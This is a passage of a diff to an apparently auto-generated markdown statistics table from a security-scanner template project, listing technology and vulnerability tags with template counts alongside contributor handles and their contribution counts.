| huowuzhao | 2 | | | | | | | -| tomcat | 5 | foulenzer | 2 | | | | | | | -| dedecms | 5 | pxmme1337 | 2 | | | | | | | -| jolokia | 5 | me9187 | 2 | | | | | | | -| drupal | 5 | g4l1t0 | 2 | | | | | | | -| crlf | 5 | r3naissance | 2 | | | | | | | -| printer | 5 | 0xrudra | 2 | | | | | | | -| phpmyadmin | 5 | ehsahil | 2 | | | | | | | -| ssti | 5 | zomsop82 | 2 | | | | | | | -| deserialization | 5 | gevakun | 2 | | | | | | | -| headless | 5 | nkxxkn | 2 | | | | | | | -| lucee | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| java | 5 | socketz | 2 | | | | | | | -| windows | 5 | johnjhacking | 2 | | | | | | | -| iis | 5 | bing0o | 2 | | | | | | | -| strapi | 4 | manas_harsh | 2 | | | | | | | -| amazon | 4 | parth | 2 | | | | | | | -| symantec | 4 | lotusdll | 2 | | | | | | | -| thinkphp | 4 | afaq | 2 | | | | | | | -| grafana | 4 | hahwul | 2 | | | | | | | -| git | 4 | arcc | 2 | | | | | | | -| samsung | 4 | joeldeleep | 2 | | | | | | | -| hongdian | 4 | 0xcrypto | 2 | | | | | | | -| rfi | 4 | random-robbie | 2 | | | | | | | -| wso2 | 4 | bp0lr | 2 | | | | | | | -| firebase | 4 | mohammedsaneem | 2 | | | | | | | -| npm | 4 | dheerajmadhukar | 2 | | | | | | | -| slack | 4 | 0xelkomy | 2 | | | | | | | -| artifactory | 4 | koti2 | 2 | | | | | | | -| thinkcmf | 4 | alifathi-h1 | 2 | | | | | | | -| moodle | 4 | moritz nentwig | 2 | | | | | | | -| traversal | 4 | tirtha_mandal | 1 | | | | | | | -| solarwinds | 4 | soyelmago | 1 | | | | | | | -| glpi | 4 | divya_mudgal | 1 | | | | | | | -| symfony | 4 | revblock | 1 | | | | | | | -| zimbra | 4 | naglinagli | 1 | | | | | | | -| webserver | 4 | izn0u | 1 | | | | | | | -| elastic | 4 | hakluke | 1 | | | | | | | -| asp | 4 | zandros0 | 1 | | | | | | | -| proxy | 4 | thezakman | 1 | | | | | | | -| vpn | 4 | ahmetpergamum | 1 | | | | | | | -| fatpipe | 4 | dawid-czarnecki | 1 | | | | | | | -| firmware | 4 | d0rkerdevil | 1 | | | | | | | -| resin | 4 | forgedhallpass | 1 | | | | | | | -| magmi | 4 | luskabol | 1 | | | | | | | -| zabbix | 4 | ohlinge | 1 | | | | | | | -| buffalo | 4 | jteles | 1 | | | | | | | -| exchange | 4 | udyz | 1 | | | | | | | -| maps | 4 | furkansenan | 1 | | | | | | | -| targa | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| nexus | 3 | _harleo | 1 | | | | | | | -| openam | 3 | raesene | 1 | | | | | | | -| search | 3 | ringo | 1 | | | | | | | -| oa | 3 | xstp | 1 | | | | | | | -| ebs | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| kevinlab | 3 | kre80r | 1 | | | | | | | -| httpd | 3 | juicypotato1 | 1 | | | | | | | -| hoteldruid | 3 | clarkvoss | 1 | | | | | | | -| springcloud | 3 | noamrathaus | 1 | | | | | | | -| github | 3 | kba@sogeti_esec | 1 | | | | | | | -| jellyfin | 3 | mah3sec_ | 1 | | | | | | | -| cve2007 | 3 | vzamanillo | 1 | | | | | | | -| kafka | 3 | mesaglio | 1 | | | | | | | -| ofbiz | 3 | willd96 | 1 | | | | | | | -| ssh | 3 | s1r1u5_ | 1 | | | | | | | -| lfr | 3 | tim_koopmans | 1 | | | | | | | -| opensis | 3 | streetofhackerr007 | 1 | | | | | | | -| vbulletin | 3 | whynotke | 1 | | | | | | | -| bigip | 3 | patralos | 1 | | | | | | | -| terramaster | 3 | _darrenmartyn | 1 | | | | | | | -| openssh | 3 | ldionmarcil | 1 | | | | | | | -| linkerd | 3 | deena | 1 | | | | | | | -| caucho | 3 | thebinitghimire | 1 | | | | | | | -| itop | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| cacti | 3 | blckraven | 1 | | | | | | | -| cves | 3 | nytr0gen | 1 | | | | | | | -| prometheus | 3 | elmahdi | 1 | | | | | | | -| log | 3 | pudsec | 1 | | | | | | | -| nosqli | 3 | cookiehanhoan | 1 | | | | | | | -| tikiwiki | 3 | _c0wb0y_ | 1 | | | | | | | -| fanruan | 3 | apt-mirror | 1 | | | | | | | -| jeesns | 3 | taielab | 1 | | | | | | | -| bitrix | 3 | affix | 1 | | | | | | | -| kibana | 3 | th3.d1p4k | 1 | | | | | | | -| smtp | 3 | sy3omda | 1 | | | | | | | -| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | -| r-seenet | 3 | co0nan | 1 | | | | | | | -| mail | 3 | kareemse1im | 1 | | | | | | | -| nacos | 3 | hanlaomo | 1 | | | | | | | -| backdoor | 3 | rodnt | 1 | | | | | | | -| injection | 3 | sickwell | 1 | | | | | | | -| node | 3 | j33n1k4 | 1 | | | | | | | -| fpd | 3 | mubassirpatel | 1 | | | | | | | -| druid | 3 | bolli95 | 1 | | | | | | | -| azure | 3 | remonsec | 1 | | | | | | | -| mongodb | 3 | ajaysenr | 1 | | | | | | | -| microstrategy | 3 | absshax | 1 | | | | | | | -| telerik | 3 | alex | 1 | | | | | | | -| rstudio | 2 | sec_hawk | 1 | | | | | | | -| spark | 2 | berkdusunur | 1 | | | | | | | -| backups | 2 | c3l3si4n | 1 | | | | | | | -| ucmdb | 2 | ahmed sherif | 1 | | | | | | | -| hostheader-injection | 2 | petruknisme | 1 | | | | | | | -| aruba | 2 | manuelbua | 1 | | | | | | | -| adminer | 2 | notsoevilweasel | 1 | | | | | | | -| hasura | 2 | yashgoti | 1 | | | | | | | -| pega | 2 | retr0 | 1 | | | | | | | -| vcenter | 2 | knassar702 | 1 | | | | | | | -| aviatrix | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| splunk | 2 | geraldino2 | 1 | | | | | | | -| huawei | 2 | adrianmf | 1 | | | | | | | -| natshell | 2 | @github.com/defr0ggy | 1 | | | | | | | -| places | 2 | philippdelteil | 1 | | | | | | | -| bucket | 2 | omarkurt | 1 | | | | | | | -| smb | 2 | droberson | 1 | | | | | | | -| oauth | 2 | shelld3v | 1 | | | | | | | -| frp | 2 | flag007 | 1 | | | | | | | -| hashicorp | 2 | daviey | 1 | | | | | | | -| commax | 2 | bjhulst | 1 | | | | | | | -| vrealize | 2 | 0h1in9e | 1 | | | | | | | -| db | 2 | bad5ect0r | 1 | | | | | | | -| status | 2 | elder tao | 1 | | | | | | | -| payara | 2 | akshansh | 1 | | | | | | | -| shellshock | 2 | b4uh0lz | 1 | | | | | | | -| saltstack | 2 | rotemreiss | 1 | | | | | | | -| chamilo | 2 | alph4byt3 | 1 | | | | | | | -| sonicwall | 2 | fmunozs | 1 | | | | | | | -| hjtcloud | 2 | fopina | 1 | | | | | | | -| flir | 2 | ipanda | 1 | | | | | | | -| jsf | 2 | undefl0w | 1 | | | | | | | -| dos | 2 | evolutionsec | 1 | | | | | | | -| netis | 2 | ilovebinbash | 1 | | | | | | | -| glassfish | 2 | jrolf | 1 | | | | | | | -| openvpn | 2 | 0xrod | 1 | | | | | | | -| enumeration | 2 | jeya seelan | 1 | | | | | | | -| text | 2 | shifacyclewla | 1 | | | | | | | -| geowebserver | 2 | brabbit10 | 1 | | | | | | | -| prestashop | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| akamai | 2 | makyotox | 1 | | | | | | | -| ec2 | 2 | yashanand155 | 1 | | | | | | | -| totemomail | 2 | its0x08 | 1 | | | | | | | -| liferay | 2 | smaranchand | 1 | | | | | | | -| qihang | 2 | qlkwej | 1 | | | | | | | -| nextcloud | 2 | elouhi | 1 | | | | | | | -| horde | 2 | un-fmunozs | 1 | | | | | | | -| openfire | 2 | ooooooo_q | 1 | | | | | | | -| icewarp | 2 | micha3lb3n | 1 | | | | | | | -| couchdb | 2 | kabirsuda | 1 | | | | | | | -| heroku | 2 | intx0x80 | 1 | | | | | | | -| ilo | 2 | pratik khalane | 1 | | | | | | | -| plesk | 2 | b0rn2r00t | 1 | | | | | | | -| sonarqube | 2 | oscarintherocks | 1 | | | | | | | -| emerge | 2 | 0xtavian | 1 | | | | | | | -| minio | 2 | gboddin | 1 | | | | | | | -| sitecore | 2 | @dwisiswant0 | 1 | | | | | | | -| paloalto | 2 | becivells | 1 | | | | | | | -| idrac | 2 | thevillagehacker | 1 | | | | | | | -| showdoc | 2 | iampritam | 1 | | | | | | | -| jboss | 2 | pdp | 1 | | | | | | | -| kentico | 2 | borna nematzadeh | 1 | | | | | | | -| globalprotect | 2 | akash.c | 1 | | | | | | | -| leak | 2 | b0yd | 1 | | | | | | | -| phpcollab | 2 | shreyapohekar | 1 | | | | | | | -| avantfax | 2 | andirrahmani1 | 1 | | | | | | | -| akkadian | 2 | defr0ggy | 1 | | | | | | | -| hpe | 2 | nerrorsec | 1 | | | | | | | -| favicon | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| weblogic | 14 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | incogbyte | 4 | | | | | | | +| zoho | 13 | sullo | 3 | | | | | | | +| dns | 13 | tess | 3 | | | | | | | +| adobe | 13 | mavericknerd | 3 | | | | | | | +| devops | 13 | f1tz | 3 | | | | | | | +| jenkins | 12 | yash anand @yashanand155 | 3 | | | | | | | +| dlink | 12 | 0w4ys | 3 | | | | | | | +| manageengine | 12 | emenalf | 3 | | | | | | | +| wp-theme | 11 | shifacyclewala | 3 | | | | | | | +| cve2013 | 11 | binaryfigments | 3 | | | | | | | +| dell | 10 | shine | 3 | | | | | | | +| xxe | 10 | unstabl3 | 3 | | | | | | | +| intrusive | 10 | idealphase | 3 | | | | | | | +| ftp | 9 | _generic_human_ | 3 | | | | | | | +| magento | 9 | z3bd | 3 | | | | | | | +| vmware | 9 | impramodsargar | 3 | | | | | | | +| airflow | 8 | skeltavik | 3 | | | | | | | +| ruijie | 8 | thomas_from_offensity | 3 | | | | | | | +| backup | 8 | vsh00t | 3 | | | | | | | +| nginx | 8 | jarijaas | 3 | | | | | | | +| scada | 8 | sushantkamble | 3 | | | | | | | +| ibm | 8 | fyoorer | 3 | | | | | | | +| rails | 8 | dudez | 3 | | | | | | | +| gitlab | 8 | sy3omda | 2 | | | | | | | +| cve2008 | 8 | alifathi-h1 | 2 | | | | | | | +| cnvd | 8 | mohammedsaneem | 2 | | | | | | | +| microsoft | 8 | me9187 | 2 | | | | | | | +| netgear | 7 | convisoappsec | 2 | | | | | | | +| coldfusion | 7 | g4l1t0 | 2 | | | | | | | +| cms | 7 | randomrobbie | 2 | | | | | | | +| kubernetes | 7 | vavkamil | 2 | | | | | | | +| hp | 7 | ree4pwn | 2 | | | | | | | +| files | 7 | nkxxkn | 2 | | | | | | | +| confluence | 7 | lotusdll | 2 | | | | | | | +| docker | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | bsysop | 2 | | | | | | | +| citrix | 6 | 0xsmiley | 2 | | | | | | | +| fileupload | 6 | 0xsapra | 2 | | | | | | | +| laravel | 6 | hahwul | 2 | | | | | | | +| api | 6 | r12w4n | 2 | | | | | | | +| nodejs | 6 | afaq | 2 | | | | | | | +| django | 6 | 0xrudra | 2 | | | | | | | +| solr | 6 | cocxanh | 2 | | | | | | | +| camera | 6 | joeldeleep | 2 | | | | | | | +| lucee | 6 | johnjhacking | 2 | | | | | | | +| jetty | 6 | ehsahil | 2 | | | | | | | +| tomcat | 5 | pxmme1337 | 2 | | | | | | | +| printer | 5 | arcc | 2 | | | | | | | +| ssti | 5 | random-robbie | 2 | | | | | | | +| java | 5 | davidmckennirey | 2 | | | | | | | +| windows | 5 | huowuzhao | 2 | | | | | | | +| crlf | 5 | whoever | 2 | | | | | | | +| dedecms | 5 | x1m_martijn | 2 | | | | | | | +| phpmyadmin | 5 | dheerajmadhukar | 2 | | | | | | | +| iis | 5 | fabaff | 2 | | | | | | | +| headless | 5 | 0xcrypto | 2 | | | | | | | +| circarlife | 5 | manas_harsh | 2 | | | | | | | +| jolokia | 5 | moritz nentwig | 2 | | | | | | | +| drupal | 5 | zomsop82 | 2 | | | | | | | +| deserialization | 5 | kiblyn11 | 2 | | | | | | | +| firmware | 4 | socketz | 2 | | | | | | | +| zimbra | 4 | bp0lr | 2 | | | | | | | +| proxy | 4 | gal nagli | 2 | | | | | | | +| wso2 | 4 | gevakun | 2 | | | | | | | +| zabbix | 4 | bernardofsr | 2 | | | | | | | +| elastic | 4 | r3naissance | 2 | | | | | | | +| glpi | 4 | koti2 | 2 | | | | | | | +| thinkphp | 4 | hetroublemakr | 2 | | | | | | | +| thinkcmf | 4 | amsda | 2 | | | | | | | +| traversal | 4 | parth | 2 | | | | | | | +| symfony | 4 | bing0o | 2 | | | | | | | +| vpn | 4 | 0xelkomy | 2 | | | | | | | +| firebase | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| rfi | 4 | w4cky_ | 2 | | | | | | | +| exchange | 4 | foulenzer | 2 | | | | | | | +| asp | 4 | 0xprial | 2 | | | | | | | +| npm | 4 | swissky | 2 | | | | | | | +| amazon | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| hongdian | 4 | exploitation | 1 | | | | | | | +| symantec | 4 | sickwell | 1 | | | | | | | +| buffalo | 4 | 0xtavian | 1 | | | | | | | +| magmi | 4 | qlkwej | 1 | | | | | | | +| slack | 4 | philippdelteil | 1 | | | | | | | +| grafana | 4 | gboddin | 1 | | | | | | | +| maps | 4 | mubassirpatel | 1 | | | | | | | +| webserver | 4 | toufik airane | 1 | | | | | | | +| strapi | 4 | bolli95 | 1 | | | | | | | +| moodle | 4 | izn0u | 1 | | | | | | | +| artifactory | 4 | dawid-czarnecki | 1 | | | | | | | +| fatpipe | 4 | juicypotato1 | 1 | | | | | | | +| git | 4 | ringo | 1 | | | | | | | +| samsung | 4 | alex | 1 | | | | | | | +| solarwinds | 4 | 0ut0fb4nd | 1 | | | | | | | +| resin | 4 | ohlinge | 1 | | | | | | | +| backdoor | 3 | b0rn2r00t | 1 | | | | | | | +| mongodb | 3 | kabirsuda | 1 | | | | | | | +| node | 3 | mesaglio | 1 | | | | | | | +| druid | 3 | makyotox | 1 | | | | | | | +| opensis | 3 | pudsec | 1 | | | | | | | +| ssh | 3 | 52971 | 1 | | | | | | | +| prometheus | 3 | elder tao | 1 | | | | | | | +| telerik | 3 | sshell | 1 | | | | | | | +| nosqli | 3 | brabbit10 | 1 | | | | | | | +| fpd | 3 | mah3sec_ | 1 | | | | | | | +| ebs | 3 | ahmed sherif | 1 | | | | | | | +| httpd | 3 | whynotke | 1 | | | | | | | +| oa | 3 | retr0 | 1 | | | | | | | +| jellyfin | 3 | ajaysenr | 1 | | | | | | | +| injection | 3 | sicksec | 1 | | | | | | | +| nacos | 3 | oscarintherocks | 1 | | | | | | | +| terramaster | 3 | x6263 | 1 | | | | | | | +| tikiwiki | 3 | yashgoti | 1 | | | | | | | +| openam | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| bypass | 2 | rojanrijal | 1 | | | | | | | -| chiyu | 2 | andysvints | 1 | | | | | | | -| middleware | 2 | infosecsanyam | 1 | | | | | | | -| axis | 2 | mass0ma | 1 | | | | | | | -| ecology | 2 | 52971 | 1 | | | | | | | -| mailchimp | 2 | wabafet | 1 | | | | | | | -| embed | 2 | mhdsamx | 1 | | | | | | | -| nextjs | 2 | zhenwarx | 1 | | | | | | | -| harbor | 2 | schniggie | 1 | | | | | | | -| nagios | 2 | bernardo rodrigues | 1 | | | | | | | +| targa | 3 | tim_koopmans | 1 | | | | | | | +| cve2007 | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| itop | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| zhiyuan | 3 | smaranchand | 1 | | | | | | | +| cacti | 3 | xstp | 1 | | | | | | | +| openssh | 3 | adrianmf | 1 | | | | | | | +| log | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| search | 3 | lark lab | 1 | | | | | | | +| r-seenet | 3 | zandros0 | 1 | | | | | | | +| nexus | 3 | omarkurt | 1 | | | | | | | +| github | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| springcloud | 3 | absshax | 1 | | | | | | | +| fanruan | 3 | remonsec | 1 | | | | | | | +| jeesns | 3 | un-fmunozs | 1 | | | | | | | +| caucho | 3 | _darrenmartyn | 1 | | | | | | | +| microstrategy | 3 | luci | 1 | | | | | | | +| smtp | 3 | nvn1729 | 1 | | | | | | | +| hoteldruid | 3 | apt-mirror | 1 | | | | | | | +| cves | 3 | 0xteles | 1 | | | | | | | +| vbulletin | 3 | kareemse1im | 1 | | | | | | | +| linkerd | 3 | daviey | 1 | | | | | | | +| kafka | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| bitrix | 3 | shifacyclewla | 1 | | | | | | | +| kevinlab | 3 | ipanda | 1 | | | | | | | +| bigip | 3 | iampritam | 1 | | | | | | | +| kibana | 3 | yashanand155 | 1 | | | | | | | +| azure | 3 | ratnadip gajbhiye | 1 | | | | | | | +| mail | 3 | elouhi | 1 | | | | | | | +| lfr | 3 | regala_ | 1 | | | | | | | +| ofbiz | 3 | jteles | 1 | | | | | | | +| s3 | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| showdoc | 2 | petruknisme | 1 | | | | | | | +| favicon | 2 | nytr0gen | 1 | | | | | | | +| sonarqube | 2 | hanlaomo | 1 | | | | | | | +| db | 2 | its0x08 | 1 | | | | | | | +| enumeration | 2 | furkansenan | 1 | | | | | | | +| hasura | 2 | shelld3v | 1 | | | | | | | +| igs | 2 | hakluke | 1 | | | | | | | +| ucmdb | 2 | andysvints | 1 | | | | | | | +| aviatrix | 2 | fmunozs | 1 | | | | | | | +| service | 2 | j33n1k4 | 1 | | | | | | | +| akamai | 2 | aresx | 1 | | | | | | | +| spark | 2 | undefl0w | 1 | | | | | | | +| prtg | 2 | blckraven | 1 | | | | | | | +| leak | 2 | fopina | 1 | | | | | | | +| activemq | 2 | pratik khalane | 1 | | | | | | | +| kentico | 2 | cookiehanhoan | 1 | | | | | | | +| guacamole | 2 | borna nematzadeh | 1 | | | | | | | +| adminer | 2 | droberson | 1 | | | | | | | +| mcafee | 2 | tirtha_mandal | 1 | | | | | | | +| wordfence | 2 | nerrorsec | 1 | | | | | | | +| netis | 2 | geraldino2 | 1 | | | | | | | +| dolibarr | 2 | raesene | 1 | | | | | | | +| fortios | 2 | soyelmago | 1 | | | | | | | +| horde | 2 | streetofhackerr007 | 1 | | | | | | | +| aruba | 2 | pdp | 1 | | | | | | | +| paloalto | 2 | micha3lb3n | 1 | | | | | | | +| middleware | 2 | becivells | 1 | | | | | | | +| places | 2 | rojanrijal | 1 | | | | | | | +| cache | 2 | s1r1u5_ | 1 | | | | | | | +| splunk | 2 | deena | 1 | | | | | | | +| nextjs | 2 | @github.com/defr0ggy | 1 | | | | | | | +| bitly | 2 | 0xrod | 1 | | | | | | | +| jsf | 2 | ilovebinbash | 1 | | | | | | | +| storage | 2 | thebinitghimire | 1 | | | | | | | +| yapi | 2 | wabafet | 1 | | | | | | | +| minio | 2 | kurohost | 1 | | | | | | | +| openfire | 2 | vzamanillo | 1 | | | | | | | +| frp | 2 | jrolf | 1 | | | | | | | +| linux | 2 | thevillagehacker | 1 | | | | | | | +| upload | 2 | _c0wb0y_ | 1 | | | | | | | +| qcubed | 2 | akshansh | 1 | | | | | | | +| globalprotect | 2 | jeya seelan | 1 | | | | | | | +| commax | 2 | evolutionsec | 1 | | | | | | | +| wuzhicms | 2 | intx0x80 | 1 | | | | | | | +| heroku | 2 | alperenkesk | 1 | | | | | | | +| cve2005 | 2 | d0rkerdevil | 1 | | | | | | | +| chyrp | 2 | notsoevilweasel | 1 | | | | | | | +| saltstack | 2 | berkdusunur | 1 | | | | | | | +| avantfax | 2 | udyz | 1 | | | | | | | +| backups | 2 | kre80r | 1 | | | | | | | +| jeedom | 2 | ahmetpergamum | 1 | | | | | | | +| bucket | 2 | schniggie | 1 | | | | | | | +| seeyon | 2 | _harleo | 1 | | | | | | | +| flir | 2 | flag007 | 1 | | | | | | | +| openvpn | 2 | mass0ma | 1 | | | | | | | +| xxljob | 2 | affix | 1 | | | | | | | +| vrealize | 2 | bad5ect0r | 1 | | | | | | | +| harbor | 2 | naglinagli | 1 | | | | | | | +| nagios | 2 | akash.c | 1 | | | | | | | +| geowebserver | 2 | revblock | 1 | | | | | | | +| sonicwall | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| linux | 2 | x6263 | 1 | | | | | | | -| bitly | 2 | aresx | 1 | | | | | | | -| maian | 2 | 0ut0fb4nd | 1 | | | | | | | -| wordfence | 2 | 0xteles | 1 | | | | | | | -| qcubed | 2 | yavolo | 1 | | | | | | | -| yapi | 2 | kurohost | 1 | | | | | | | -| upload | 2 | push4d | 1 | | | | | | | -| axis2 | 2 | exploitation | 1 | | | | | | | -| s3 | 2 | sshell | 1 | | | | | | | -| activemq | 2 | sicksec | 1 | | | | | | | -| chyrp | 2 | toufik airane | 1 | | | | | | | -| netsweeper | 2 | regala_ | 1 | | | | | | | -| grav | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| yii | 2 | aceseven (digisec360) | 1 | | | | | | | -| mida | 2 | luci | 1 | | | | | | | -| cache | 2 | chron0x | 1 | | | | | | | -| wuzhicms | 2 | alperenkesk | 1 | | | | | | | -| webcam | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| xxljob | 2 | | | | | | | | | +| axis | 2 | chron0x | 1 | | | | | | | +| chamilo | 2 | c3l3si4n | 1 | | | | | | | +| plesk | 2 | defr0ggy | 1 | | | | | | | +| shellshock | 2 | patralos | 1 | | | | | | | +| huawei | 2 | b0yd | 1 | | | | | | | +| keycloak | 2 | th3.d1p4k | 1 | | | | | | | +| vcenter | 2 | noamrathaus | 1 | | | | | | | +| rockmongo | 2 | aceseven (digisec360) | 1 | | | | | | | +| ilo | 2 | taielab | 1 | | | | | | | +| hashicorp | 2 | rodnt | 1 | | | | | | | +| axis2 | 2 | divya_mudgal | 1 | | | | | | | +| yii | 2 | zhenwarx | 1 | | | | | | | +| ecoa | 2 | push4d | 1 | | | | | | | +| hjtcloud | 2 | elmahdi | 1 | | | | | | | +| payara | 2 | ooooooo_q | 1 | | | | | | | +| akkadian | 2 | @dwisiswant0 | 1 | | | | | | | +| emerge | 2 | willd96 | 1 | | | | | | | +| ecology | 2 | clarkvoss | 1 | | | | | | | +| icewarp | 2 | yavolo | 1 | | | | | | | +| oauth | 2 | ldionmarcil | 1 | | | | | | | +| pega | 2 | kba@sogeti_esec | 1 | | | | | | | +| prestashop | 2 | 0h1in9e | 1 | | | | | | | +| qihang | 2 | forgedhallpass | 1 | | | | | | | +| mailchimp | 2 | infosecsanyam | 1 | | | | | | | +| dos | 2 | bjhulst | 1 | | | | | | | +| hpe | 2 | thezakman | 1 | | | | | | | +| odoo | 2 | rotemreiss | 1 | | | | | | | +| sharepoint | 2 | b4uh0lz | 1 | | | | | | | +| trixbox | 2 | sec_hawk | 1 | | | | | | | +| chiyu | 2 | manuelbua | 1 | | | | | | | +| kong | 2 | shreyapohekar | 1 | | | | | | | +| nextcloud | 2 | luskabol | 1 | | | | | | | +| idrac | 2 | co0nan | 1 | | | | | | | +| webcam | 2 | andirrahmani1 | 1 | | | | | | | +| netsweeper | 2 | mhdsamx | 1 | | | | | | | +| tidb | 2 | knassar702 | 1 | | | | | | | +| bruteforce | 2 | alph4byt3 | 1 | | | | | | | +| text | 2 | | | | | | | | | | voipmonitor | 2 | | | | | | | | | -| guacamole | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| trixbox | 2 | | | | | | | | | -| fortios | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| jeedom | 2 | | | | | | | | | -| prtg | 2 | | | | | | | | | -| rockmongo | 2 | | | | | | | | | -| odoo | 2 | | | | | | | | | -| igs | 2 | | | | | | | | | -| seeyon | 2 | | | | | | | | | -| cve2005 | 2 | | | | | | | | | -| dolibarr | 2 | | | | | | | | | -| keycloak | 2 | | | | | | | | | -| storage | 2 | | | | | | | | | -| sharepoint | 2 | | | | | | | | | -| service | 2 | | | | | | | | | -| mcafee | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | +| mida | 2 | | | | | | | | | +| status | 2 | | | | | | | | | +| natshell | 2 | | | | | | | | | +| phpcollab | 2 | | | | | | | | | +| liferay | 2 | | | | | | | | | +| maian | 2 | | | | | | | | | +| couchdb | 2 | | | | | | | | | +| smb | 2 | | | | | | | | | +| justwriting | 2 | | | | | | | | | +| sitecore | 2 | | | | | | | | | +| glassfish | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| bypass | 2 | | | | | | | | | +| grav | 2 | | | | | | | | | +| ec2 | 2 | | | | | | | | | +| jboss | 2 | | | | | | | | | +| rstudio | 2 | | | | | | | | | +| embed | 2 | | | | | | | | | +| hostheader-injection | 2 | | | | | | | | | | waf | 2 | | | | | | | | | | getsimple | 2 | | | | | | | | | -| ecoa | 2 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| photo | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| instagram | 1 | | | | | | | | | -| find | 1 | | | | | | | | | -| graph | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| locations | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| nearby | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| fcm | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| twitter | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| loqate | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| openweather | 1 | | | | | | | | | -| square | 1 | | | | | | | | | -| spotify | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| circle | 1 | | | | | | | | | -| bing | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| sendgrid | 1 | | | | | | | | | -| secmail | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| office365 | 1 